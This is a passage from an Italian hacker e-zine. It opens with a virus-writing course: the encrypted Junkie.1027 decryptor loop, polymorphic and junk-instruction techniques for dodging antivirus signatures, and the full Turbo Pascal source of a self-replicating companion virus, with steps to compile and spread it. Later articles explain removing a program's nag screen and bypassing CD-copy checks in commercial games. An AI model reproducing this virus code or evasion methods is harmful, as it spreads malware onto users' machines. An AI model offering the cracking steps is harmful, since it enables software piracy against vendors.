0002: B9F401 MOV CX,01F4 0003: 26 ES: 0004: 8134BC2E XOR WORD PTR [SI],2EBC 0005: 46 INC SI 0006: 46 INC SI 0007: E2F7 LOOP $0001 0008: %qui inizia il corpo del virus in forma cifrata La prima istruzione punta l'inizio del corpo del virus (riga 0008); la seconda imposta il numero di bytes da decifrare, solitamente corrispondente alla lunghezza del virus stesso (01F4 = 500 WORD = 1000 BYTES 1027). Ecco di seguito l'operatore crittografico "XOR" che lavora usando una chiave a 16-bit (1 WORD). Quindi ci sono le istruzioni di scarto per passare alla word successiva e infine l'istruzione ciclica LOOP. Questo un esempio generico di motore crittografico, le varianti possono essere le pi svariate, a partire dagli operatori matematici usati (XOR, ADD, SUB, NOT, ADC, SBB) o sulle istruzioni cicliche (cambiabili con salti condizionati JZ, JNZ). VI- Virus POLIMORFICI Utilizzando la tecnica della cifratura un virus diventa riconoscibile solo ed esclusivamente dal suo motore crittografico, ma usando le opportune accortezze possibile realizzare dei parassiti che modificano questo motore cifrante ad ogni infezione. Cos difficile che 2 files infetti dallo stesso virus risultino simili. Questa tecnica, denominata polimorfismo, viene realizzata sia usando dei tools esterni (MtE, TPE, DAME, DSCE, SMEG) che vengono linkati al corpo del virus, sia scrivendo un proprio codice polimorfico all'interno del virus. Grosso modo una routine polimorfa segue questo schema di funzionamento: - la prima cosa da fare scrivere un motore crittografico molto flessibile, dove le istruzioni possano essere scambiate, usando diversi operatori crittografici, il motore dello Junkie.1027 visto prima pu andare bene: 0001: BE0800 MOV SI,0008 0002: B9F401 MOV CX,01F4 0003: 26 ES: 0004: 8134BC2E XOR WORD PTR [SI],2EBC 0005: 46 INC SI 0006: 46 INC SI 0007: E2F7 LOOP $0001 0008: %qui inizia il corpo del virus in forma cifrata l'operatore crittografico XOR pu essere variato, usando ad esempio ADD e SUB che generano i seguenti codici: 0004: 8104BC2E ADD WORD PTR [SI],2EBC 0004: 812CBC2E SUB WORD PTR [SI],2EBC abbiamo in totale quindi 3 trasformazioni del nostro motore (XOR, ADD, SUB), dove per cambia solo un bytes. Un'altra variazione si pu operare sul segmento dati ES, nei file COM possiamo usare in alternativa anche i segmenti DS e CS. 0003: 2E CS: 0003: 3E DS: Con quest'altre due variazioni il numero di trasformazioni cresce a 9, con due bytes di differenza. Altra modifica possibile sul registro di indirizzamento dati SI, che pu essere alternato con DI e BX generando numerose varianti di codice: Usando BX 0001: BB0800 MOV BX,0008 / 8137BC2E XOR WORD PTR [BX],2EBC 0004: - | 8107BC2E ADD WORD PTR [BX],2EBC \ 812FBC2E SUB WORD PTR [BX],2EBC 0005: 46 INC BX Usando SI 0001: BF0800 MOV DI,0008 / 8135BC2E XOR WORD PTR [DI],2EBC 0004: - | 8105BC2E ADD WORD PTR [DI,2EBC \ 812DBC2E SUB WORD PTR [DI],2EBC 0005: 47 INC DI In questo modo le combinazioni ottenute crescono veramente tanto e il motore si riduce a qualcosa del tipo: 0001: ??0800 MOV ??,0008 0002: B9F401 MOV CX,01F4 0003: ?? ??: 0004: 81??BC2E ?? WORD PTR [??],2EBC 0005: ?? INC ?? 0006: ?? INC ?? 0007: E2F7 LOOP $0001 Dove l'indirizzo "0008" e la chiave di cifratura "2EBC" variano da file a file, quindi la stringa del virus si riduce a soli 6 bytes costanti: "?? ?? ?? B9 F4 01 ?? 81 ?? ?? ?? ?? ?? E2 F7" niente male, davvero! Si pu ancora migliorare il polimorfismo di questo motore usando le "junk instruction", ovvero del codice inutile e indifferente che pu essere inserito per spezzare i bytes costanti. Ecco alcuni esempi di junk che non alterano il codice di un programma: - aggiunge il valore "0" a un registro 16-bit 050000 ADD AX,0000 83C600 ADD SI,+00 83C500 ADD BP,+00 - toglie il valore "0" a un registro 16-bit 83EB00 SUB BX,+00 83EF00 SUB DI,+00 83EC00 SUB SP,+00 - stesse di prima ma su registri a 8-bit 0400 ADD AL,00 80E900 SUB CL,00 - PUSH e POP una dietro l'altra 50 PUSH AX 58 POP AX - caricamento di un registro 16-bit con s stesso 89C0 MOV AX,AX 89FF MOV DI,DI 89ED MOV BP,BP - caricamento di un registro 16-bit con s stesso 87DB XCHG BX,BX 87F6 XCHG SI,SI 87E4 XCHG SP,SP - stesse di prima ma su registri a 8-bit 88C0 MOV AL,AL 88F6 MOV DH,DH 86DB XCHG BL,BL 86ED XCHG CH,CH - salti condizionali inutili (0-jump) EB00 JMP seguente 7500 JNZ seguente 7400 JZ seguente 7F00 JG seguente 7700 JA seguente E la lista potrebbe continuare, c' solo l'imbarazzo della scelta. Inserendo istruzioni di questo tipo dentro al codice non solo si sende il codice pi contorto da districare, ma si rende la lunghezza della stringa variabile, modificando ogni volta la posizione dei pochi bytes costanti rimasti. PRIMA LEZIONE Programmazione di un virus Companion usando Turbo Pascal La maggioranza dei virus viene scritta in linguaggi a basso livello, che operano pi velocemente e pi vicino al cuore del sistema operativo; tuttavia tentativi di realizzare virus usando linguaggi ad alto livello (tipo BASIC, C++, PASCAL) sono stati fatti, con risultati pi o meno buoni. Questa specie di virus viene identificata dalla sigla "HLLx", che sta per "High Level Language" mentre la "x" identifica meglio il tipo di parassita: O=overwriting virus (virus che sovrascrive i files durante le infezioni, con danni irreparabili) C=companion virus P=parasitic virus L'esempio di questa lezione sar un semplice virus di tipo Companion (HLLC quindi) scritto usando il pi comune dei linguaggi: il Turbo Pascal. E' richiesta solo una conoscenza base (non approfondita) del linguaggio per capire il listato del virus. }--------------------------> INIZIO <---------------------------{ {Type: COMPANION VIRUS Desc: Ricerca e infetta 1 file EXE, creando il file COM corrispondente con una copia del virus. Ogni dir contiene al massimo 3 file EXE infetti} {$M 1024,0,1024} {Direttive al compilatore per ottimizzare l'uso di memoria RAM} PROGRAM VIRUS_SAMPLE1; USES DOS,CRT,STRINGS; TYPE CHARFILE=FILE OF CHAR; VAR File1,File2: SearchRec; VirFile: string[12]; F,G: CHARFILE; anno, mese, giorno, nomegiorno: Word; {Ricava il nome del file COM dall'EXE trovato} PROCEDURE ConverteNomeEXE(VAR File1:SearchRec); VAR i:integer; BEGIN i:=0; WHILE (i<=8) AND (File1.Name[i]<>'.') DO BEGIN VirFile[i]:=File1.Name[i]; inc(i); END; virfile[i]:='.'; virfile[i+1]:='C'; virfile[i+2]:='O'; virfile[i+3]:='M'; END; {Riceve un file Sorgente e uno Destinazione e li copia} PROCEDURE CopiaFile(VAR S,D:CHARFILE); VAR byte:char; BEGIN ASSIGN(D,VirFile); ASSIGN(S,File2.Name); REWRITE(D); RESET(S); WHILE NOT EOF(S) DO BEGIN READ(S,byte); WRITE(D,byte); END; CLOSE(S); CLOSE(D); END; {Modifica il file COM per eseguire l'applicazione ospite} PROCEDURE ModificaFile(VAR F:CHARFILE); VAR i:integer; byte:char; BEGIN RESET(F); SEEK(F,1081); i:=0; WHILE (i<=8) AND (File1.Name[i]<>'.') DO BEGIN WRITE(F,File1.Name[i]); inc(i); END; byte:='.'; WRITE(F,byte); byte:='E'; WRITE(F,byte); byte:='X'; WRITE(F,byte); byte:='E'; WRITE(F,byte); byte:=chr(00); WRITE(F,byte); CLOSE(F); END; {Main} BEGIN ClrScr; {cancella lo schermo} FindFirst('*.EXE', Archive, File1); {cerca il primo file EXE} {se stato trovato almeno un file EXE si prosegue} IF DosError = 0 THEN BEGIN ConverteNomeEXE(File1); {Vede se esiste gi un COM nascosto, quindi il file gi infetto} FindFirst(VirFile, Hidden, File2); {se non esiste c' errore e si pu procedere con l'infezione} IF DosError<>0 THEN BEGIN FindFirst('*.COM', Hidden, File2); CopiaFile(G,F); ModificaFile(F); SetFAttr(F, 34); END ELSE BEGIN {se il primo EXE gi infetto cerca il secondo EXE} FindNext(File1); ConverteNomeEXE(File1); FindFirst(VirFile, Hidden, File2); IF DosError<>0 THEN BEGIN FindFirst('*.COM', Hidden, File2); CopiaFile(G,F); ModificaFile(F); SetFAttr(F, 34); END ELSE BEGIN {se il secondo EXE gi infetto cerca il terzo EXE} FindNext(File1); ConverteNomeEXE(File1); FindFirst(VirFile, Hidden, File2); IF DosError<>0 THEN BEGIN FindFirst('*.COM', Hidden, File2); CopiaFile(G,F); ModificaFile(F); SetFAttr(F, 34); END; END; END; END; {routine di attivazione "payload} GetDate(anno,mese,giorno,nomegiorno); IF (mese=1) AND (giorno=1) THEN BEGIN CLRSCR; WRITELN('Date:',giorno,'/',mese,'/',anno); WRITELN('Right Moment to Buy an Antivirus!'); WRITELN; WRITELN('HLLC.7200 Companion Virus'); WRITELN('Pascal Sample Written for VIROPEDIA 1.0'); READLN; END; {ritorna all'esecuzione del programma originale} Exec('12345678.EXE',''); END. }---------------------------> FINE <----------------------------{ Per compilare questo virus bisogna usare queste accortezze: - compilare il sorgente usando TURBO PASCAL o BP - rinominare il file ottenuto con "12345678.COM" - impostare al file attributo nascosto "ATTRIB +H 12345678.COM" - creare un file EXE ospite per il virus col nome "12345678.EXE" potete creare il file ospite usando lo stesso Pascal (per restare in tema.) PROGRAM FIRST_HOST; BEGIN WRITELN('HLLC.7200 Virus Sample for Viropedia'); WRITELN('Primo ospite campione per'); WRITELN('la replicazione del virus'); END. Il virus ora pronto, basta copiare i file "12345678.COM" e "12345678.EXE" per diffonderlo. Il suo metodo di infezione consiste nel ricercare fino a 3 file EXE nella dir corrente e a creare un file COM corrispondente nascosto. Il file COM contiene una copia del virus che viene eseguita subito, quindi il file ritorna il controllo al file EXE originale. L'attivazione di questo virus (innocua) consiste nel mostrare un messaggio a video il giorno 1 Gennaio di qualsiasi anno. SECONDA LEZIONE Nozioni base di Assembly Come tutti voi sapete i virus sono scritti in un linguaggio molto vicino a quello "naturale" del computer, l'Assembly; i listati scritti in questo linguaggio sono caratterizzati dall'estensione ASM (a volte anche A86). Prima di passare alla scrittura di un virus in assembly, facciamo una breve carrellata su questo linguaggio e sulle sue funzionalit. ALGEBRA Un buon programmatore assembly deve conoscere necessariamente l'aritmetica binaria e quella esadecimale. Il nostro sistema tradizionale di numerazione (decimale) usa 10 simboli (0-1-2-3-4-5-6-7-8-9) per rappresentare i numeri; il sistema binario ne usa solo 2 (0-1), quello esadecimale, abbreviato con "hex", ne usa 16 (0-1-2-3-4-5-6-7-8-9-A-B-C-D-E-F). Il fattore di conversione un puro calcolo matematico; ovviamente un numero rappresentato in binario occuper pi cifre di uno in decimale, mentre uno in forma hex sar meno lungo di uno decimale. Esempio: DEC=1234 BIN=10011010010 HEX=4D2 Sotto ASM possibile gestire molto praticamente questi 3 diversi sistemi di numerazione, quello di default il decimale, ma possibile scrivere numeri negli altri formati aggiungendo "B" e "H" alla fine del numero. Esempio: 10011010010B 4D2H I numeri hex non possono cominciare con una lettera A55H non ammesso, 0A55H s REGISTRI Gli elementi chiave dell'assembly sono i registri, ovvero delle particolari celle di memoria che possono memorizzare determinati valori. La dimensione dei registri dipende dal processore e dalla compilazione usata, inizieremo a lavorare con i registri a 16-bit (2 BYTE=1 WORD). Registri a 16-bit AX BX CX DX SI DI CS DS ES SS BP SP IP I primi 4 registri sono ancora suddivisi in registri a 8-bit, che indicano rispettivamente la parte alta e la parte bassa del registro. AX Accumulatore (diviso in AH e AL) BX Puntatore memoria (diviso in BH e BL) CX Contatore dei cicli (diviso in CH e CL) DX Dati (diviso in DH e DL) SI Sorgente dati DI Destinazione dati Abbiamo poi i registri di segmento, che indicano delle porzioni di memoria RAM da 64K. CS Code Segment (segmento codice in esecuzione) DS Data Segment (segmento zona dati) ES Extra Segment (segmento aggiuntivo) SS Stack Segment (segmento stack) BP Base Pointer (punta la cima dello stack) SP Stack Pointer (punta la fine dello stack) IP Instruction Pointer (punta l'istruzione corrente) I registri che possono indirizzare la memoria, cio riferirsi a dei dati contenuti in un certo punto della RAM, sono solo BX,SI e DI. Nei processori 386 e superiori esistono i registri a 32-bit che richiedono debugger particolari per il loro controllo. Registri a 32-bit EAX EBX ECX EDX ESI EDI CS DS ES SS FS GS EBP ESP EIP Volete vedere dal vivo i registri? Usate il comando del dos chiamato "DEBUG" (lo userete molto spesso!) e seguite l'esempio: C:\>DEBUG -R AX=0000 BX=0000 CX=0000 DX=0000 SP=FFEE BP=0000 SI=0000 DI=0000 DS=0E3C ES=0E3C SS=0E3C CS=0E3C IP=0100 NV UP EI PL NZ NA PO NC 0E3C:0100 37 AAA - Il comando "R" vi d lo stato attuale dei registri, inoltre viene restituita anche l'istruzione da eseguire (AAA), con il relativo codice hex. L'istruzione seguente sempre puntata dall'indirizzo CS:IP. Esistono poi alcuni "tester" chiamati FLAG. Essi sono degli switch che possono valere 0 o 1 e scattano in date condizioni: CF Carry Flag Flag di riporto, indica un riporto nelle somme e nelle sottrazioni. PF Parity Flag Bit di parit, viene usato nei processi di comunicazione ZF Zero Flag Se settato indica che il risultato di una operazione zero SF Sign Flag Flag di segno, indica se considerare il numero in assoluto o col segno TF Trap Flag Usato dal debugger per controllare l'esecuzione passo-passo (trappola) DF Direction Indica il verso in cui bisogna lavorare con le stringhe (1=avanti, 0=indietro) ISTRUZIONI BASE Ora che conoscete i registri possiamo passare alla presentazione di alcune istruzioni base del linguaggio, le pi comuni e usate: ADD Addizione tra due registri, tra un numero e un registro, tra un'area di memoria e un registro, tra un'area di memoria e un numero. Esempio: Codice Istruzione 053412 ADD AX,1234 ;aggiunge in AX il valore 1234H 01D0 ADD AX,DX ;aggiunge in AX il valore di DX 00F4 ADD AH,DH ;aggiunge in AH il valore di DH 00DC ADD AH,BL ;aggiunge in AH il valore di BL 0307 ADD AX,[BX] ;aggiunge in AX il valore WORD puntato dall'indirizzo di BX 0207 ADD AL,[BX] ;aggiunge in AX il valore BYTE puntato dall'indirizzo di BX 80C199 ADD CL,99 ;aggiunge in CL il valore 99H Come potete notare possibile operare solo con registri della stessa dimensione o con registri e valori dello stesso formato. Ad esempio un'addizione del numero 1234 (16-bit) al registro AL (8-bit) errata. Inoltre in caso di ambiguit bisogna specificare se il dato da manipolare di tipo WORD (16-bit) o di tipo BYTE (8-bit), usando l'istruzione "PTR" 800711 ADD BYTE PTR [BX],11 81073412 ADD WORD PTR [BX],1234 Se il numero risultato eccede per il registro, il flag di riporto verr settato su ON. L'istruzione non pu accedere direttamente ai registri di segmento, ad esempio se si vuole aggiungere 100 a DS bisogna farlo indirettamente. SUB Funzione inversa di ADD, effettua la sottrazione tra numeri, registri o valori. Stesso funzionamento di ADD. INC / DEC Nel caso di addizione o sottrazione di 1, si possono usare queste due istruzioni, molto pi veloci e ridotte in termini di spazio: 050100 ADD AX,0001 40 INC AX 83EB01 SUB BX,+01 4B DEC BX ^^^^^^^ ^^ 3 bytes 1 byte Non si possono usare direttamente sui registri di segmento. MOV Muove un valore dentro a un registro, o un registro dentro un altro registro, un valore dentro un'area di memoria o un registro dentro un'area di memoria. B83412 MOV AX,1234 ; carica in AX il valore 1234H 89FE MOV SI,DI ; carica in SI il valore di DI C7073412 MOV WORD PTR [BX],1234 ; carica nella zona puntata da [BX] 1234H 8907 MOV [BX],AX ; carica nella zona puntata da [BX] AX Usando questa istruzione possibile accedere ai registri di segmento e modificarli: 8CDA MOV DX,DS ; carica in DX il valore di DS 81C20001 ADD DX,0100 ; aggiunge 100H a DX 8EC2 MOV ES,DX ; carica in ES il valore di DX Non sono ammesse manipolazioni sui registri CS e IP. PUSH / POP Permettono di salvare un registro o il valore puntato da un registro nello stack per poi ripristinarlo. Domanda: quanto vale AX dopo aver eseguito queste istruzioni: B80001 MOV AX,0100 50 PUSH AX 050001 ADD AX,0100 58 POP AX Risposta: vale ancora 100H, perch il valore viene salvato con PUSH e poi ripristinato. In questo modo anche possibile manipolare i registri di segmento, come abbiamo visto prima con l'istruzione MOV. 1E PUSH DS 5A POP DX 81C20001 ADD DX,0100 52 PUSH DX 1F POP DS E' l'equivalente dell'istruzione MOV vista poc'anzi. Non si possono tuttavia salvare registri a 8-bit (PUSH AL non ammessa). PUSH va a memorizzare il valore all'indirizzo puntato dal registro SP e sottrae 2 a questo registro; la POP si comporta inversamente, restituisce il valore puntato da SP e gli aggiunge 2. NOP E' un'istruzione progettata per non fare nulla, assolutamente nulla. A cosa serve direte voi?? Per le ottimizzazioni di codice, cio per sincronizzare le esecuzioni e i trasferimenti dati. Il suo codice esadecimale 90H. CMP Istruzione di confronto, serve per confrontare tra di loro due registri, delle posizioni di memoria. 39D8 CMP AX,BX ; confronto tra registri 16-bit 38D8 CMP AL,BL ; confronto tra registri 8-bit 39FE CMP SI,DI ; confronto tra registri 16-bit 3904 CMP [SI],AX ; confronto tra valore puntato e registro 3B0F CMP CX,[BX] ; confronto tra registro e valore puntato 3D3412 CMP AX,1234 ; confronto tra registro e valore diretto 16-bit 80FC12 CMP AH,12 ; confronto tra registro e valore diretto 8-bit 803C12 CMP BYTE PTR [SI],12 ; confronto tra val. puntato e val. diretto 8-bit 813D3412 CMP WORD PTR [DI],1234 ; confronto tra val. puntato e val. diretto 16-bit Non si possono confrontare tra di loro due valori diretti o due valori puntati contemporaneamente. Occorre caricare uno di essi prima in un registro e poi eseguire il confronto su quel registro. JMP Salta a un indirizzo, simile all'istruzione GOTO del Basic. Si pu usare in diversi formati: E9FD03 JMP 0500 ; salta all'indirizzo 500H EA78563412 JMP 1234:5678 ; salta all'indirizzo 5678H del segmento di memoria 1234H FFE3 JMP BX ; salta al valore di BX FF27 JMP [BX] ; salta al valore puntato dal registro BX JNZ / JZ Salti condizionali, eseguono il salto se una data condizione vera o no. In questo caso la condizione data dallo zero flag, esistono per altri tipi di salti: JNC / JC salta se non c' / se c' riporto (Jump if Not Carry) JNA / JA salta se non superiore / se superiore (Jump if Not Above) JNB / JB salta se non inferiore / se inferiore (Jump if Not Below) JCXZ salta se il registro CX zero (Jump if CX is Zero) Di solito il salti condizionali seguono ad un'istruzione CMP o ad una OR. I salti condizionali hanno un limite (range) per cui non si possono fare salti dall'indirizzo corrente ad uno che superi i 181H (385D) bytes. ....continua sul prossimo numero! [Il file Sample01.zip contiene i listati e gli eseguibili del virus companion di cui si parla nell'articolo] PFloriK ͻ CRACKiNG NAG SCREEN CHE PASSi0NE ͼ Salve amici, ci sono molte cose che odio nella mia vita e tra queste c'e' la pasta scotta, la gente in ritardo agli appuntamenti, ed i NAG SCREEN. Detto questo credo che abbiate capito che non ho intenzione di fare un articolo di cucina ne' uno di morale, ma un piccolo aiuto a tutti quelli che odiano avere il proprio prg. preferito con all'interno scritte di ogni tipo. Oggi Internet sembra aver preso il posto delle numerose BBS a cui ognuno di noi si collegava, ma questo non e' cosi', da qui la necessita' di avere un programma di comunicazione installato. Il programma che ho preso in esame e' il Telix 115d, che secondo il mio illustrissimo parere e' il migliore in giro sulla rete. Non ho intenzione di parlarvi del crack che potrete facilmente procuravi (o richiedermelo se proprio non lo trovate in giro!), ma del nag screen iniziale che anche se avete lanciato il crack vi lascia sempre la scritta UNREGISTERED in rosso al centro del logo di telix. Qualcuno di voi potra' dire e chi se ne frega, il programma gira quindi .... Ma vi assicuro che e' veramente frustrante!! Passiamo al pratico: quello che vi serve e' un buon hex editor ed il visual c++ un po' esagerato direte voi, ma questo e' il modo piu' semplice per fare quello che dobbiamo fare :-) Aprite con il vostro hex editor l'eseguibile di telix e cercate la stringa unregistered.............ne troverete diverse, sostituitele tutte con quello che piu' vi aggrada e provate a rilanciare il programma. Mmmmm! Non va il logo e' sempre coperto da quel maledetto UNREGISTERED, ma allora che abbiamo combinato prima? Semplice, abbiamo cambiato quell'unregistered che e' presente a fianco del titolo della finestra. Allora le ipotesi sono 3: o la scritta e' criptata in qualche modo, o e' presente in qualche libreria oppure e' grafica!!! Di queste ne sono vere 2, infatti e' grafica ed e' presente in una libreria! Allora passiamo all'azione, caricate il C++, caricate in memoria la libreria telixr.dll (provate ad immaginare per che cosa stia quella R !!!), aprite la cartella con le bitmap e poi clickate sul 111. WOW eccovi scovata la famosa scritta unregistered, adesso il problema e' che se provate a cancellare la grafica otterrete un bel buco bianco allo start di telix, se provate a togliere il subfolder 111 si impianta tutto, quindi la soluzione consiste nel ridurre le dimensioni della scritta ad un pixel e cambiargli colore con un grigio che si confonda con lo sfondo, salvate la libreria (che diverra' un pochino piu' grande se non disabilitate le opzioni per il debug), Et voila' il gioco e' fatto!!! Ovviamente in questo modo potrete cambiare qualsiasi grafica non vi aggradi all'interno di qualsiasi prg che ve lo permetta! Questo e' uno degli approcci possibili per ottenere il risultato voluto, ma avreste anche potuto cercare la CALL che abilitava la bitmap 111 ed eliminarla! Alla prossima puntata, bye! The_Hawk ͻ CRACKiNG MiNi GUiDA PER SPR0TEGGERE i Gi0CHi ͼ DEDiCATA A CHi Di CRACKiNG N0N NE SA NULLA ;-) Questa guida cos come scritto nel titolo dedicata a chi di cracking non ne capisce nulla ma ha la necessit di sproteggere un gioco senza impazzire con programmi come softice e simili. Con i consigli che troverete qui di seguito riuscirete a sproteggere solo una piccola parte dei giochi che trovate in commercio (diciamo un 20%?) ma mi sembra meglio di niente no? Allora perch abbiamo la necessit di sproteggere un gioco? Forse perch non ci va di comprarlo originale o perch non abbiamo un masterizzatore per poter fare la copia fisica? Quante volte ci capitato che un nostro amico ci ha prestato un gioco originale che ha appena comprato e non siamo riusciti a farlo funzionare perch pur copiando l'intero CD su hard disk una volta lanciato l'eseguibile mi usciva sempre fuori la famosa scritta "inserire il cd nel lettore". Gli scopi di questa guida sono: - elencare una serie di sistemi che permettono di saltare il cd-check (presenza del cd originale all'interno del lettore) - dare qualche consiglio su come far okkupare ai giochi il minor spazio possibile una volta che sono stati copiati su HD - come utilizzare il game wizard per craccare i giochi (scritto da CAVALLO) Ripeto questi sistemi funzionano solo a volte e in pochi casi ma vi assicuro che prima che anche io cominciassi ad usare softice e prima di comprarmi il masterizzatore li usavo spesso e qualche volte con una buona dose di culo e intuito riuscivo a sproteggere il gioco. PARTE 1: VARI SISTEMI PER "SALTARE IL CD-CHECK" Nota: sottointeso che per far funzionare questi metodi io debba copiare l'intero cd o sua parte (vedi Parte 2) sull'HD. Solo in alcuni casi l'installazione max da parte del gioco sufficiente quindi consiglio sempre di fare un raffronto tra installazione max e contenuto reale del cd. Molte volte alcuni file necessari pur facendo l'installazione massima vengono lasciati sul cd. Quindi controllate gente controllate! 1) METODO INFALLIBILE: Copiate il gioco su HD, accedete a internet andate in giro per il web o per qualche canale di iRC e vedete se qualcuno ha gi provveduto per voi. Nel caso riusciate in ci il gioco riuscirete a sproteggerlo al 100%. ;-) Dai su stavo solo scherzando... ora inizio a scrivere qualcosa di serio e di utile, comunque se non riuscite a sproteggere il gioco con nessuno dei sistemi sotto elencati provate a cercare il crack sulla rete o cominciate a studiare seriamente l'arte del cracking. un buon punto di partenza in lingua italiana la famosa: The Xoanon's Guide to Cracking ( by Xoanon ). Detto questo iniziamo seriamente o quasi ;-) . 2) CD-CHECK BASATI SULLA LABEL CD: Ci sono alcuni giochi che per verificare la presenza del cd nel lettore usano la label del cd. Quindi per questo tipo di giochi (non ne ho incontrati molti) basta rinominare il proprio HD con la stessa label del cd e usare successivamente il famoso comando subst. Il subst un comando del dos che permette di creare delle unit virtuali, in questo caso il gioco vede queste unit virtuali come un cd-rom, vediamo come funziona: SUBST [unit1: [unit2:]percorso] SUBST unit1: /D unit1: Specifica l'unit virtuale da assegnare al percorso di ricerca. [unit2:]percorso Specifica l'unit fisica ed il percorso da assegnare all'unit virtuale. /D Elimina l'unit virtuale specificata. Digitare SUBST senza parametri per visualizzare l'elenco delle unit virtuali esistenti. Un gioco che utilizza questo tipo di protezione il bellissimo MDK, per sproteggerlo non dovete far altro che copiare il cd su HD in una dir c:\mdk ad esempio (attenzione che nel cd originale ci sono 200 mega di demo perfettamente inutili (se usate l'install scegliete l'installazione massima, okkupa circa 100MB). Una volta fatto ci rinominate l'hd con la label del cd di Mdk (MDK) e successivamente usate il comando subst. Nel nostro caso dovremmo scrivere subst x: c:\mdk dove x: una lettera libera. Nel caso incontriate giochi basati su questo tipo di protezioni vi consiglio di farvi un bel file .bat. che rinomini automaticamente la label. 3) CD-CHECK CHE SI FREGANO CON IL SUBST: Non ci crederete ma si riescono a eliminare pi cd check con il comando subst del Dos che abbiamo esaminato sopra che con altri programmi simili che esamineremo in seguito. Volete subito qualche nome? Tra quelli che mi ricordo vi potrei citare The Dig e Roland Garros 97. Esamineremo il secondo gioco in quanto pi recente. Installate normalmente Roland Garros (45MB) da CD (magari vi consiglio di usare per il CD in questo caso una lettera che non vi serve tipo G:, per fare ci usate gestione periferiche). Una volta installato in c:\rg97 ad esempio scrivete subst x: c:\rg97 dove x: la lettera del drive da dove avete installato il gioco (per questo motivo sopra vi avevo detto di usare una lettera in cui normalmente non avete nessuna periferica associata). La lettera del cdrom si cambia facilmente da gestione periferiche di windows95. 4) CD-CHECK BASATI SUI FILE DI CONFIGURAZIONE O DI SETUP: A volte alcuni giochi quando vengono installati creano generalmente nella directory principale di instalalzione dei file con estensione .cfg o dei file setup.xxx (xxx l'estensione). Io vi consiglio di dare sempre uno sguardo con il comune edit del Dos a questi file. Perch fare ci? Semplice a volte all'interno di questi file troviamo diciture tipo: cdpath= d:\ o cd= d:\ ... Tutto quello che dobbiamo fare cambiare queste diciture con altre di nostro comodo tipo: cdpatch= c:\gioco1 o cd= c:\gioco1 ... Dove gioco1 ad esempio la directory in cui noi abbiamo copiato il gioco. Anche in questo caso facciamo un paio di esempi. Giochi che usano questo tipo di protezione sono ad esempio Theme Hospital e PowerF1. Nella dir principale dei giochi in questione troviamo un file .cfg. Diamoci un'occhiata con l'edit del dos e subito noteremo che compare la lettera d:\ identificativa del CD. Bene sostituiamola con il path della dir in cui noi abbiamo installato il gioco e in questo modo il cd-check superato. 5) CD-CHECK CHE SI FREGANO USANDO PROGRAMMI TIPO FAKECD O 0CD Indispensabili per questo tipo di sprotezione il possesso dei due programmi sopracitati, ce ne sono anche degli altri simili ma io vi consiglio questi due perch sono quelli che mi hanno dato pi soddisfazioni. Usarli semplicissimo e di solito vanno abbinati al comando subst che abbiamo esaminato precedentemente. Questi due programmi permettono di emulare il Cd in maniera abbastanza buona ma solo in alcuni casi quindi non ci fate troppo affidamento non tutto oro quello che luccica (cazzo ma sono un poeta!). Per l'uso di questi programmi io consiglio di: - usarli sotto dos (non il prompt) - non aver il driver mscdex installato (il cd-rom) - di usarli abbinati al comando subst Quindi in questo caso non mi dilungher in spiegazioni ma passo direttamente ad un'esempio. Nel primo Tomb Raider (il primo non so il secondo!) il cd check viene facilmente saltato usando 0CD e il comando subst abbinati. Naturalmente il comando subst lo uso sulla "stessa lettera" in cui io ho usato il fake cd o lo 0cd. p.s. se volete far funzionare i nude patch del suddetto gioco dovete usare per forza la procedura sopra descritta. 6) CD-CHECK CHE SI FREGANO CON VIRTUAL-CD Questo programma secondo me mitico perch riesce a fregare molte delle protezioni esistenti. I giochi che si possono fregare con questo programma sono tantissimi quindi cercate di procurarvelo. Come funziona? Be semplicissimo, basta lanciare il programma inserire il cd da "craccare" e al resto pensa tutto lui! Praticamente il programma compatta in un unico file tutto il contenuto del cd e quando noi vogliamo giocare con il gioco in questione mi basta lanciare il virtual cd cliccare sul gioco desiderato e via! Come ho gi detto poche righe sopra secondo me questo programma quello che da pi soddisfazioni dal punto di vista di pratico in quanto si riescono a craccare moltissimi giochi ci sono per dei contro: - per fare funzionare i giochi in questione io devo usare sempre detto programma - il programma mi fa una sorta di immagine dell'intero cd includendo quindi anche cose che a volte possono risultare inutili tipo i demo o le directx e io non le posso eliminare e ci causa occupazione di spazio su HD del tutto inutile - funziona solo sotto windows 95 7) FREGHIAMO IL CD-CHECK TRAMITE IL REG EDIT DI WINDOWS 95 Secondo me regedit (lo trovate all'interno della dir di windows 95) uno degli strumenti pi belli di windoze, ci si possono fare un sacco di cose, ma vediamo come usarlo per provare a saltare qualche cd-check (se non ricordo male funziona con Diablo tra gli altri) Allora lanciamo il reg edit andiamo in: HKEY_LOCAL_MACHINE e successivamente in: SOFTWARE Guarda che bello ci sono tutte le marche dei vari giochi che ho installato sul mio picci (naturalmente stiamo parlando di giochi che funzionano solo per windows 95, e che facendo l'installazione, vanno a modificare questa sezione del file di registro). Che faccio io? Be semplice vado a cercare fra i vari software il mio gioco e do un okkiata ai "Dati". Se sono tanto fortunato da trovare Cd_Path o roba simile lo vado a modificare in maniera alquanto agile. Ci siamo capiti no? Chiudo regedit e provo a lanciare il gioco. Questa procedura a volte sufficiente molte altre volte no. Prima di passare alla parte 2 un po' di consigli: - mi raccomando controllate che tutte le parti del cd siano installate (potete evitare di copiarvi le directx e i demo inclusi spesso nei cd) - i metodi sopra elencati funzionano si ma solo a volte, cosa saggia sarebbe lavorare di debugger (leggetevi la guida di xoanon) - se proprio non riuscite a afre nulla masterizzatevi il cd o provate a chiedere in giro il crack (trovare crack per giochi molto difficile, fate prima a chiedere dell'eseguibile magari) - mi raccomando quando modificate i file di cfg o simili fate sempre una copia di riserva - so che molte cose non sono spiegate bene, ma cercate di capirmi molte delle sprotezioni spiegate sopra con un po' di pratica e culo non necessitano di ulteriori spiegazioni - in molti casi occorre usare un po di cervello - sicuramente potrete avere pi soddisfazioni usando il programma virtual cd (ultimamente sproteggere i giochi pi duro di una volta!) PARTE 2: "RIPPIAMO IL CD?" Cosa vuol dire "rippare?" be in parole povere, molto povere, vuol dire eliminare parte dei giochi che sono inutili e che okkupano solo spazio su hard disk. Quali sono queste parti? Be di solito tutti i maggiori gruppi tendono a rippare quelli che sono i filmati, le musiche (solo se in formato wav), le direct x, i demo o i filmati dimostrativi che sono contenuti all'interno dei cd, i vari linguaggi (di solito si lascia solo l'inglese) ecc. Una volta rippato il gioco generalmente viene compresso usando programmi tipo il pkzip o il rar, suddividendolo in vari dischetti da 1.4 mega per una eventuale archiviazione. Quando io copio il mio gioco su cd per "craccarlo" gi posso sin da subito eliminare le direct x e i vari demo o filmati inclusi nelle subdirectory che 